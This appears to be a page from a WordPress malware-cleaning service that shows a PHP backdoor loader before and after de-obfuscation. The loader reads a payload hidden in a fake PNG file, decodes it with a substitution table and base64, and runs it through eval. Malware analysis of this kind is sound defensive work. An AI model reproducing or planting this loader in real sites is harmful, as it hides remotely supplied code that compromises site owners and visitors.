De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.01 | <?php |
02 |
03 | function surybu_beshaxyshav( $vuneva_ehatahaw ) { |
04 | $ajepiva = strtr ( $vuneva_ehatahaw , array ( 'r' => 'Q' , 'F' => 'W' , 'Q' => 'E' , 'T' => 'R' , 'D' => 'T' , 'U' => 'Y' , 'S' => 'U' , 'C' => 'I' , 'R' => 'O' , 'M' => 'P' , |
05 | 'n' => 'A' , 'Z' => 'S' , 'G' => 'D' , 'e' => 'F' , 'K' => 'G' , 'P' => 'H' , 't' => 'J' , 'y' => 'K' , '8' => 'L' , 'E' => 'Z' , |
06 | 'O' => 'X' , 'W' => 'C' , '+' => 'V' , 'B' => 'B' , 'I' => 'N' , 'a' => 'M' , 'm' => 'q' , 'A' => 'w' , 'N' => 'e' , 'i' => 'r' , |
07 | 'H' => 't' , 'j' => 'y' , 'h' => 'u' , 'J' => 'i' , '3' => 'o' , '/' => 'p' , 'q' => 'a' , '0' => 's' , 'o' => 'd' , '=' => 'f' , |
08 | 'w' => 'g' , 'c' => 'h' , '1' => 'j' , 'V' => 'k' , '7' => 'l' , 'z' => 'z' , 'u' => 'x' , 'b' => 'c' , 'd' => 'v' , 'x' => 'b' , |
09 | 'X' => 'n' , '5' => 'm' , '2' => '1' , 'g' => '2' , 'p' => '3' , '9' => '4' , 'Y' => '5' , 'k' => '6' , 'L' => '7' , 'f' => '8' , |
10 | 's' => '9' , '6' => '0' , 'v' => '=' , '4' => '+' , 'l' => '/' )); |
11 | $ajepiva = base64_decode ( $ajepiva ); |
12 |
13 | return $ajepiva ; |
14 | } |
15 |
16 | function ujoxuq_wifechaze( $vuneva_ehatahaw ) { |
17 | if (! file_exists ( $vuneva_ehatahaw )) |
18 | return false; |
19 | $baqoga = @ file_get_contents ( $vuneva_ehatahaw ); |
20 | if (! $baqoga ) |
21 | return false; |
22 | $baqoga = substr ( $baqoga , 3); |
23 | $rivezyq = surybu_beshaxyshav( $baqoga ); |
24 | return $rivezyq ; |
25 | } |
26 |
27 | $ujucac = __DIR__ . '/assets/images/wibubal.png' ; |
28 |
29 | if ( file_exists ( $ujucac )) { |
30 | $ashoceb = ujoxuq_wifechaze( $ujucac ); |
31 | if ( $ashoceb ) { |
32 | @ eval ( $ashoceb ); |
33 | } |
34 | } |
01 | <?php |
02 |
03 | function surybu_beshaxyshav( $vuneva_ehatahaw ) |
04 | { |
05 | $ajepiva = strtr ( $vuneva_ehatahaw , array ( 'r' => 'Q' , 'F' => 'W' , 'Q' => 'E' , 'T' => 'R' , 'D' => 'T' , 'U' => 'Y' , 'S' => 'U' , 'C' => 'I' , 'R' => 'O' , 'M' => 'P' , 'n' => 'A' , 'Z' => 'S' , 'G' => 'D' , 'e' => 'F' , 'K' => 'G' , 'P' => 'H' , 't' => 'J' , 'y' => 'K' , '8' => 'L' , 'E' => 'Z' , 'O' => 'X' , 'W' => 'C' , '+' => 'V' , 'B' => 'B' , 'I' => 'N' , 'a' => 'M' , 'm' => 'q' , 'A' => 'w' , 'N' => 'e' , 'i' => 'r' , 'H' => 't' , 'j' => 'y' , 'h' => 'u' , 'J' => 'i' , '3' => 'o' , '/' => 'p' , 'q' => 'a' , '0' => 's' , 'o' => 'd' , '=' => 'f' , 'w' => 'g' , 'c' => 'h' , '1' => 'j' , 'V' => 'k' , '7' => 'l' , 'z' => 'z' , 'u' => 'x' , 'b' => 'c' , 'd' => 'v' , 'x' => 'b' , 'X' => 'n' , '5' => 'm' , '2' => '1' , 'g' => '2' , 'p' => '3' , '9' => '4' , 'Y' => '5' , 'k' => '6' , 'L' => '7' , 'f' => '8' , 's' => '9' , '6' => '0' , 'v' => '=' , '4' => '+' , 'l' => '/' )); |
06 | $ajepiva = base64_decode ( $ajepiva ); |
07 | return $ajepiva ; |
08 | } |
09 | function ujoxuq_wifechaze( $vuneva_ehatahaw ) |
10 | { |
11 | if (! file_exists ( $vuneva_ehatahaw )) { |
12 | return false; |
13 | } |
14 | $baqoga = @ file_get_contents ( $vuneva_ehatahaw ); |
15 | if (! $baqoga ) { |
16 | return false; |
17 | } |
18 | $baqoga = substr ( $baqoga , 3); |
19 | $rivezyq = surybu_beshaxyshav( $baqoga ); |
20 | return $rivezyq ; |
21 | } |
22 | $ujucac = "/var/www/html/assets/images/wibubal.png" ; |
23 | if ( file_exists ( $ujucac )) { |
24 | $ashoceb = ujoxuq_wifechaze( $ujucac ); |
25 | if ( $ashoceb ) { |
26 | @ eval ( $ashoceb ); |
27 | } |
28 | } |
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.